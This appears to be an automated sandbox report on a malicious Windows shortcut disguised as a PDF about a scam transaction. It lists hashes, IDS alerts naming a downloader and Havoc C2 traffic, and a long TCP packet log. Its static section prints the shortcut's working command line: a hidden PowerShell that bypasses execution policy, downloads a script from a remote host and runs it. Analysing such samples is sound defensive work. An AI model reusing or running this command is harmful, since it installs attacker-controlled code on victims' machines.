                                                  • Windows Shortcut (20020/1) 100.00%
                                                  File name:Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk
                                                  File size:1'073 bytes
                                                  MD5:1fdc0eb15af0f989e5cc7ab9fc8e14ec
                                                  SHA1:b15076953f50268ca6e5cc57f3279a3652da5311
                                                  SHA256:623767715bd1a33c41e2de8ab3af341e629105132c3434f454cf249f98adbfd7
                                                  SHA512:6724c23940bea1d328aa39364a0ff82d7c94c560045316ea265fe4e75d950f75f597c6d14ebf62da875a22db5df0f03c770ebaaab854becf089eef14d579661d
                                                  SSDEEP:12:8nHnY0m/B/JwsseVSXPY1sld4lMn8fALlJlM3GNcW+UcZ5wiuaXxQLZMUmK7nYbg:8HYJJ/JvYnzTv+/Z5xCVMUDYYqVKp
                                                  TLSH:1A113A192EFA0B14E6B69E3398BB97205E7BFD45EE70570D12855A090C62A10E921F37
                                                  File Content Preview:L..................F.... ......~.?.....7.I...@.~.?...0......................5....P.O. .:i.....+00.../C:\...................V.1.....}Y.D..Windows.@........X.:.Y. ...........................'..W.i.n.d.o.w.s.....Z.1......YJ7..System32..B........X.:.Y. ......

                                                  File Icon

                                                  Icon Hash:929e9e96a3f3d6ed

                                                  Static Windows Shortcut Info

                                                  General

                                                  Relative Path:..\..\..\Windows\System32\cmd.exe
                                                  Command Line Argument:/c start /min powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}"
                                                  Icon location:%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-12-19T13:35:09.604537+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44973289.35.237.17080TCP
                                                  2024-12-19T13:35:11.835744+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44973389.35.237.170443TCP
                                                  2024-12-19T13:35:12.823279+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44973289.35.237.17080TCP
                                                  2024-12-19T13:35:15.071412+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.44973489.35.237.170443TCP
                                                  2024-12-19T13:35:19.388292+01002056539ET MALWARE Havoc Demon CnC Request1192.168.2.44973547.84.196.148443TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 19, 2024 13:35:03.657366991 CET4973080192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:03.777296066 CET804973089.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:03.777534008 CET4973080192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:03.780405998 CET4973080192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:03.900098085 CET804973089.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:05.215027094 CET804973089.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:05.265331030 CET4973080192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:05.458525896 CET804973089.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:05.505004883 CET4973080192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:05.527299881 CET49731443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:05.527352095 CET4434973189.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:05.527410030 CET49731443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:05.539473057 CET49731443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:05.539488077 CET4434973189.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:05.625400066 CET804973089.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:05.625612974 CET4973080192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:07.120917082 CET4434973189.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:07.120994091 CET49731443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:07.125055075 CET49731443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:07.125066042 CET4434973189.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:07.125281096 CET4434973189.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:07.136639118 CET49731443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:07.179363012 CET4434973189.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:07.867697001 CET4434973189.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:07.867764950 CET4434973189.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:07.867810011 CET49731443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:07.871599913 CET49731443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:08.022248983 CET4973280192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:08.142581940 CET804973289.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:08.142703056 CET4973280192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:08.143022060 CET4973280192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:08.263050079 CET804973289.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:09.560062885 CET804973289.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:09.561482906 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:09.561577082 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:09.561922073 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:09.561923027 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:09.562040091 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:09.604537010 CET4973280192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:11.101216078 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:11.102871895 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:11.102965117 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:11.835752010 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:11.885869980 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:11.935689926 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:11.935704947 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:11.935786963 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:11.935798883 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:11.935815096 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:11.935890913 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:11.935890913 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:11.935890913 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:11.935964108 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:11.979584932 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.062341928 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.062356949 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.062410116 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.062443018 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.062551975 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.062552929 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.062623978 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.062690020 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.103714943 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.103775024 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.103820086 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.103853941 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.103882074 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.103902102 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.220227003 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.220257998 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.220369101 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.220433950 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.220503092 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.246645927 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.246663094 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.246884108 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.246885061 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.246953964 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.247040987 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.268651009 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.268680096 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.268727064 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.268745899 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.268764973 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.268790960 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.273652077 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.273736000 CET4434973389.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.273825884 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.273825884 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.280666113 CET49733443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.302375078 CET4973280192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.423202991 CET804973289.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.781531096 CET804973289.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.782068968 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.782115936 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.782176971 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.782510042 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:12.782517910 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:12.823278904 CET4973280192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:14.326200962 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:14.327796936 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:14.327815056 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.071424961 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.120187998 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.191158056 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.191174984 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.191246033 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.191282988 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.191302061 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.191329956 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.191354036 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.191376925 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.302622080 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.302651882 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.302784920 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.302803040 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.302856922 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.345133066 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.345159054 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.345210075 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.345221043 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.345252991 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.345561028 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.455092907 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.455215931 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.455240011 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.455292940 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.455333948 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.455370903 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.484155893 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.484216928 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.484250069 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.484266043 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.484308004 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.513851881 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.513909101 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.513951063 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.513962030 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.513989925 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.514023066 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.575057030 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.575083971 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.575196028 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.575206995 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.575253963 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.588059902 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.588080883 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.588232994 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.588241100 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.588303089 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.658164024 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.658190966 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.658273935 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.658288002 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.658339024 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.674444914 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.674468040 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.674546957 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.674557924 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.674612999 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.690685034 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.690715075 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.690768957 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.690777063 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.690819979 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.705557108 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.705583096 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.705688000 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.705705881 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.705759048 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.716185093 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.716204882 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.716298103 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.716305971 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.716355085 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.728087902 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.728106022 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.728208065 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.728214025 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.728259087 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.746392965 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.746413946 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.746506929 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.746511936 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.746553898 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.766983032 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.767004967 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.767096996 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.767103910 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.767153025 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.842694998 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.842720032 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.842835903 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.842845917 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.842899084 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.852550030 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.852566957 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.852652073 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.852658987 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.852710009 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.861294031 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.861313105 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.861397028 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.861403942 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.861453056 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.870942116 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.870959997 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.871026039 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.871032000 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.871081114 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.880764961 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.880784035 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.880852938 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.880856991 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.880903006 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.905740976 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.905760050 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.905843973 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.905849934 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.905900955 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.917743921 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.917809963 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.917818069 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.917834997 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.917866945 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.917890072 CET4434973489.35.237.170192.168.2.4
                                                  Dec 19, 2024 13:35:15.917936087 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:15.947386980 CET49734443192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:16.539815903 CET4973280192.168.2.489.35.237.170
                                                  Dec 19, 2024 13:35:16.873634100 CET49735443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:35:16.873691082 CET4434973547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:35:16.873758078 CET49735443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:35:16.874730110 CET49735443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:35:16.874746084 CET4434973547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:35:18.565167904 CET4434973547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:35:18.565234900 CET49735443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:35:18.568290949 CET49735443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:35:18.568305969 CET4434973547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:35:18.568546057 CET4434973547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:35:18.614358902 CET49735443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:35:18.614382029 CET49735443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:35:18.614447117 CET4434973547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:35:19.388315916 CET4434973547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:35:19.388405085 CET4434973547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:35:19.388504982 CET49735443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:35:19.396454096 CET49735443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:35:19.396492958 CET4434973547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:35:19.396511078 CET49735443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:35:19.396521091 CET4434973547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:35:44.777993917 CET49742443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:35:44.778090000 CET4434974247.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:35:44.778364897 CET49742443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:35:44.778505087 CET49742443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:35:44.778539896 CET4434974247.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:35:46.460684061 CET4434974247.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:35:46.461580038 CET49742443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:35:46.461626053 CET4434974247.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:35:46.473278046 CET49742443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:35:46.473278999 CET49742443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:35:46.473332882 CET4434974247.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:35:46.473386049 CET4434974247.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:35:47.366189003 CET4434974247.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:35:47.366266012 CET4434974247.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:35:47.366452932 CET49742443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:35:47.366548061 CET49742443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:35:47.366548061 CET49742443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:35:47.366592884 CET4434974247.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:35:47.366626024 CET4434974247.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:17.075251102 CET49785443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:17.075303078 CET4434978547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:17.075381041 CET49785443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:17.075790882 CET49785443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:17.075809956 CET4434978547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:18.759804964 CET4434978547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:18.760577917 CET49785443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:18.760622025 CET4434978547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:18.761018991 CET49785443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:18.761046886 CET4434978547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:18.768115044 CET49785443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:18.768141985 CET4434978547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:19.650799990 CET4434978547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:19.650964022 CET4434978547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:19.651020050 CET49785443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:19.651215076 CET49785443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:19.651237965 CET4434978547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:19.651254892 CET49785443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:19.651261091 CET4434978547.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:52.091734886 CET49864443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:52.091768980 CET4434986447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:52.091922045 CET49864443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:52.095679998 CET49864443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:52.095700979 CET4434986447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:53.797230005 CET4434986447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:53.797482014 CET49864443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:53.798691988 CET49864443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:53.798707962 CET4434986447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:53.799518108 CET4434986447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:53.828728914 CET49864443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:53.828891039 CET49864443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:53.828948975 CET4434986447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:54.694466114 CET4434986447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:54.694565058 CET4434986447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:54.694617033 CET49864443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:54.694987059 CET49864443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:54.694987059 CET49864443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:36:54.695004940 CET4434986447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:36:54.695013046 CET4434986447.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:19.830184937 CET49927443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:19.830224991 CET4434992747.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:19.830614090 CET49927443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:19.833880901 CET49927443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:19.833904028 CET4434992747.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:21.520015001 CET4434992747.84.196.148192.168.2.4
                                                  Dec 19, 2024 13:37:21.520144939 CET49927443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:21.521763086 CET49927443192.168.2.447.84.196.148
                                                  Dec 19, 2024 13:37:21.521770954 CET4434992747.84.196.148192.168.2.4
